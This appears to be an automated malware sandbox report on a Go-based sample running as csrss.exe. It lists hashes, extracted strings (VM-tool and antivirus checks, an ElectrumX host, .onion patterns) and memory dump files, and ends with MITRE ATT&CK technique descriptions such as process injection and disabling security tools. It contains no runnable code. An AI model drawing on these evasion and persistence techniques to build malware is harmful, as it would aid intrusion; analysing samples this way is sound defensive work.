API String ID: 0-2405844374
Opcode ID: de3a2cf2d3909c46a913fbbc00b11d99987c1667a54191d7621522a8055b41fa
Instruction ID: 42ee82367b21563e109480012d6fe3560eb94324b5bc2d8460cea0574e50dfb9
Opcode Fuzzy Hash: de3a2cf2d3909c46a913fbbc00b11d99987c1667a54191d7621522a8055b41fa
Instruction Fuzzy Hash: E851F5B46097158FD340EF65D18575EBBE0BF88708F818A2EF48887352DB389948DB96

Uniqueness

Uniqueness Score: -1.00%

Function 00434690, Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau, xrefs: 00434756
m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat, xrefs: 004347C4
releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br, xrefs: 00434852
m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA, xrefs: 00434778

Memory Dump Source

Source File: 00000011.00000002.549328827.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.553432516.00000000009F9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.553581530.0000000000A59000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.553834711.0000000000C51000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.553854833.0000000000C55000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.553904538.0000000000CA8000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.553923365.0000000000CB6000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.553938684.0000000000CB9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.553948921.0000000000CBB000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat$ m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br$releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
API String ID: 0-626581767
Opcode ID: c984c633b3d57c7832adee5329347aa849f155eae7f752dda53143e7aca2bfc4
Instruction ID: 8241637a7f35ac624855d2df19fea6a5ed42779f520a2a5d8b1c8658a748f46b
Opcode Fuzzy Hash: c984c633b3d57c7832adee5329347aa849f155eae7f752dda53143e7aca2bfc4
Instruction Fuzzy Hash: 4551C7B4608705CFD344EF65D18575EBBE0BF88308F41886EE48887312D7799885CF9A

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: csrss.exe PID: 2268 Parent PID: 664 csrss.exeCOMMON

Executed Functions

Non-executed Functions

Function 00428B10, Relevance: 7.6, Strings: 6, Instructions: 106COMMON

Download Yara Rule

Strings

,-./01456:;<=>?@BCLMNOPSZ["\, xrefs: 00428C50
VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu, xrefs: 00428CF0
runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi, xrefs: 00428C26
bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert, xrefs: 00428C95
", xrefs: 00428CF9
runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00428CBC

Memory Dump Source

Source File: 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001F.00000002.406735701.00000000009F9000.00000040.00020000.sdmp Download File
Associated: 0000001F.00000002.406806774.0000000000A59000.00000040.00020000.sdmp Download File
Associated: 0000001F.00000002.407189360.0000000000C51000.00000040.00020000.sdmp Download File
Associated: 0000001F.00000002.407197925.0000000000C55000.00000040.00020000.sdmp Download File
Associated: 0000001F.00000002.407256236.0000000000CA8000.00000040.00020000.sdmp Download File
Associated: 0000001F.00000002.407264605.0000000000CB6000.00000040.00020000.sdmp Download File
Associated: 0000001F.00000002.407276012.0000000000CB9000.00000040.00020000.sdmp Download File
Associated: 0000001F.00000002.407284224.0000000000CBB000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: "$,-./01456:;<=>?@BCLMNOPSZ["\$VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu$bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi
API String ID: 0-2405844374
Opcode ID: de3a2cf2d3909c46a913fbbc00b11d99987c1667a54191d7621522a8055b41fa
Instruction ID: 42ee82367b21563e109480012d6fe3560eb94324b5bc2d8460cea0574e50dfb9
Opcode Fuzzy Hash: de3a2cf2d3909c46a913fbbc00b11d99987c1667a54191d7621522a8055b41fa
Instruction Fuzzy Hash: E851F5B46097158FD340EF65D18575EBBE0BF88708F818A2EF48887352DB389948DB96

Uniqueness

Uniqueness Score: -1.00%

Function 00434690, Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat, xrefs: 004347C4
m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA, xrefs: 00434778
releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br, xrefs: 00434852
releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau, xrefs: 00434756

Memory Dump Source

Source File: 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001F.00000002.406735701.00000000009F9000.00000040.00020000.sdmp Download File
Associated: 0000001F.00000002.406806774.0000000000A59000.00000040.00020000.sdmp Download File
Associated: 0000001F.00000002.407189360.0000000000C51000.00000040.00020000.sdmp Download File
Associated: 0000001F.00000002.407197925.0000000000C55000.00000040.00020000.sdmp Download File
Associated: 0000001F.00000002.407256236.0000000000CA8000.00000040.00020000.sdmp Download File
Associated: 0000001F.00000002.407264605.0000000000CB6000.00000040.00020000.sdmp Download File
Associated: 0000001F.00000002.407276012.0000000000CB9000.00000040.00020000.sdmp Download File
Associated: 0000001F.00000002.407284224.0000000000CBB000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat$ m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br$releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
API String ID: 0-626581767
Opcode ID: c984c633b3d57c7832adee5329347aa849f155eae7f752dda53143e7aca2bfc4
Instruction ID: 8241637a7f35ac624855d2df19fea6a5ed42779f520a2a5d8b1c8658a748f46b
Opcode Fuzzy Hash: c984c633b3d57c7832adee5329347aa849f155eae7f752dda53143e7aca2bfc4
Instruction Fuzzy Hash: 4551C7B4608705CFD344EF65D18575EBBE0BF88308F41886EE48887312D7799885CF9A

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: csrss.exe PID: 4848 Parent PID: 3352 csrss.exeCOMMON

Executed Functions

Non-executed Functions

Function 00428B10, Relevance: 7.6, Strings: 6, Instructions: 106COMMON

Download Yara Rule

Strings

VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu, xrefs: 00428CF0
bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert, xrefs: 00428C95
,-./01456:;<=>?@BCLMNOPSZ["\, xrefs: 00428C50
runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi, xrefs: 00428C26
", xrefs: 00428CF9
runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00428CBC

Memory Dump Source

Source File: 00000021.00000002.401387176.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.403664259.00000000009F9000.00000040.00020000.sdmp Download File
Associated: 00000021.00000002.403771739.0000000000A59000.00000040.00020000.sdmp Download File
Associated: 00000021.00000002.405081350.0000000000C51000.00000040.00020000.sdmp Download File
Associated: 00000021.00000002.405104148.0000000000C55000.00000040.00020000.sdmp Download File
Associated: 00000021.00000002.405430643.0000000000CA8000.00000040.00020000.sdmp Download File
Associated: 00000021.00000002.405455302.0000000000CB6000.00000040.00020000.sdmp Download File
Associated: 00000021.00000002.405468680.0000000000CB9000.00000040.00020000.sdmp Download File
Associated: 00000021.00000002.405511934.0000000000CBB000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: "$,-./01456:;<=>?@BCLMNOPSZ["\$VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu$bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi
API String ID: 0-2405844374
Opcode ID: de3a2cf2d3909c46a913fbbc00b11d99987c1667a54191d7621522a8055b41fa
Instruction ID: 42ee82367b21563e109480012d6fe3560eb94324b5bc2d8460cea0574e50dfb9
Opcode Fuzzy Hash: de3a2cf2d3909c46a913fbbc00b11d99987c1667a54191d7621522a8055b41fa
Instruction Fuzzy Hash: E851F5B46097158FD340EF65D18575EBBE0BF88708F818A2EF48887352DB389948DB96

Uniqueness

Uniqueness Score: -1.00%

Function 00434690, Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br, xrefs: 00434852
m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat, xrefs: 004347C4
releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau, xrefs: 00434756
m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA, xrefs: 00434778

Memory Dump Source

Source File: 00000021.00000002.401387176.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.403664259.00000000009F9000.00000040.00020000.sdmp Download File
Associated: 00000021.00000002.403771739.0000000000A59000.00000040.00020000.sdmp Download File
Associated: 00000021.00000002.405081350.0000000000C51000.00000040.00020000.sdmp Download File
Associated: 00000021.00000002.405104148.0000000000C55000.00000040.00020000.sdmp Download File
Associated: 00000021.00000002.405430643.0000000000CA8000.00000040.00020000.sdmp Download File
Associated: 00000021.00000002.405455302.0000000000CB6000.00000040.00020000.sdmp Download File
Associated: 00000021.00000002.405468680.0000000000CB9000.00000040.00020000.sdmp Download File
Associated: 00000021.00000002.405511934.0000000000CBB000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat$ m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br$releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
API String ID: 0-626581767
Opcode ID: c984c633b3d57c7832adee5329347aa849f155eae7f752dda53143e7aca2bfc4
Instruction ID: 8241637a7f35ac624855d2df19fea6a5ed42779f520a2a5d8b1c8658a748f46b
Opcode Fuzzy Hash: c984c633b3d57c7832adee5329347aa849f155eae7f752dda53143e7aca2bfc4
Instruction Fuzzy Hash: 4551C7B4608705CFD344EF65D18575EBBE0BF88308F41886EE48887312D7799885CF9A

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: csrss.exe PID: 6708 Parent PID: 3352 csrss.exeCOMMON

Executed Functions

Non-executed Functions

Function 00428B10, Relevance: 7.6, Strings: 6, Instructions: 106COMMON

Download Yara Rule

Strings

,-./01456:;<=>?@BCLMNOPSZ["\, xrefs: 00428C50
bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert, xrefs: 00428C95
runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi, xrefs: 00428C26
", xrefs: 00428CF9
VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu, xrefs: 00428CF0
runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00428CBC

Memory Dump Source

Source File: 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.403499430.00000000009F9000.00000040.00020000.sdmp Download File
Associated: 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp Download File
Associated: 00000027.00000002.404465966.0000000000C51000.00000040.00020000.sdmp Download File
Associated: 00000027.00000002.404493397.0000000000C55000.00000040.00020000.sdmp Download File
Associated: 00000027.00000002.404721533.0000000000CA8000.00000040.00020000.sdmp Download File
Associated: 00000027.00000002.404734345.0000000000CB6000.00000040.00020000.sdmp Download File
Associated: 00000027.00000002.404748669.0000000000CB9000.00000040.00020000.sdmp Download File
Associated: 00000027.00000002.404770210.0000000000CBB000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: "$,-./01456:;<=>?@BCLMNOPSZ["\$VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu$bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi
API String ID: 0-2405844374
Opcode ID: de3a2cf2d3909c46a913fbbc00b11d99987c1667a54191d7621522a8055b41fa
Instruction ID: 42ee82367b21563e109480012d6fe3560eb94324b5bc2d8460cea0574e50dfb9
Opcode Fuzzy Hash: de3a2cf2d3909c46a913fbbc00b11d99987c1667a54191d7621522a8055b41fa
Instruction Fuzzy Hash: E851F5B46097158FD340EF65D18575EBBE0BF88708F818A2EF48887352DB389948DB96

Uniqueness

Uniqueness Score: -1.00%

Function 00434690, Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau, xrefs: 00434756
m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat, xrefs: 004347C4
m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA, xrefs: 00434778
releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br, xrefs: 00434852

Memory Dump Source

Source File: 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.403499430.00000000009F9000.00000040.00020000.sdmp Download File
Associated: 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp Download File
Associated: 00000027.00000002.404465966.0000000000C51000.00000040.00020000.sdmp Download File
Associated: 00000027.00000002.404493397.0000000000C55000.00000040.00020000.sdmp Download File
Associated: 00000027.00000002.404721533.0000000000CA8000.00000040.00020000.sdmp Download File
Associated: 00000027.00000002.404734345.0000000000CB6000.00000040.00020000.sdmp Download File
Associated: 00000027.00000002.404748669.0000000000CB9000.00000040.00020000.sdmp Download File
Associated: 00000027.00000002.404770210.0000000000CBB000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat$ m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br$releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
API String ID: 0-626581767
Opcode ID: c984c633b3d57c7832adee5329347aa849f155eae7f752dda53143e7aca2bfc4
Instruction ID: 8241637a7f35ac624855d2df19fea6a5ed42779f520a2a5d8b1c8658a748f46b
Opcode Fuzzy Hash: c984c633b3d57c7832adee5329347aa849f155eae7f752dda53143e7aca2bfc4
Instruction Fuzzy Hash: 4551C7B4608705CFD344EF65D18575EBBE0BF88308F41886EE48887312D7799885CF9A

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
